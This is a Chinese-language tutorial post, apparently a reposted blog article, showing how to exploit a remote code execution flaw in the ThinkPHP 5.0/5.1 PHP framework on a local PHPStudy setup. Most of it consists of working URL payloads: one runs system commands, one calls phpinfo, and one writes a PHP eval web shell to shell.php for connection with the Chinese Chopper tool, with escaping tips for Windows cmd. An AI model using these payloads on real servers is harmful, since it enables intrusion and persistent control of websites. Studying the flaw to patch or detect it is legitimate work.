如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行

本篇文章給大家分享的是有關(guān)如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說(shuō)，跟著小編一起來(lái)看看吧。

ThinkPHP是一款國(guó)內(nèi)流行的開源PHP框架，某些版本可能存在遠(yuǎn)程代碼執(zhí)行漏洞，攻擊者可向緩存文件內(nèi)寫入PHP代碼，導(dǎo)致遠(yuǎn)程代碼執(zhí)行。雖然該漏洞利用需要有幾個(gè)前提條件，但鑒于國(guó)內(nèi)使用ThinkPHP框架的站點(diǎn)數(shù)量之多，該漏洞還是存在一定的影響范圍.

受影響的版本包括5.0和5.1

下載ThinkPHP5.0.22版本源碼程序，放在PHPStudy運(yùn)行目錄下并訪問(wèn)

1.將Payload添加進(jìn)入U(xiǎn)RL地址后面進(jìn)行利用

Payload1:system函數(shù)遠(yuǎn)程命令執(zhí)行

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Payload2:phpinfo函數(shù)查看phpinfo()的信息

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

2.利用Payload寫入shell,并使用菜刀進(jìn)行連接

Payload1:寫入shell

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

**注意:**需要對(duì)特殊字符使用^轉(zhuǎn)義(cmd環(huán)境下轉(zhuǎn)義方式),windows環(huán)境的echo命令輸出字符串到文檔不用引號(hào)(單引號(hào)、雙引號(hào)),部分字符url編碼不編碼都行.

菜刀連接

以上就是如何實(shí)現(xiàn)ThinkPHP5.0遠(yuǎn)程代碼執(zhí)行，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。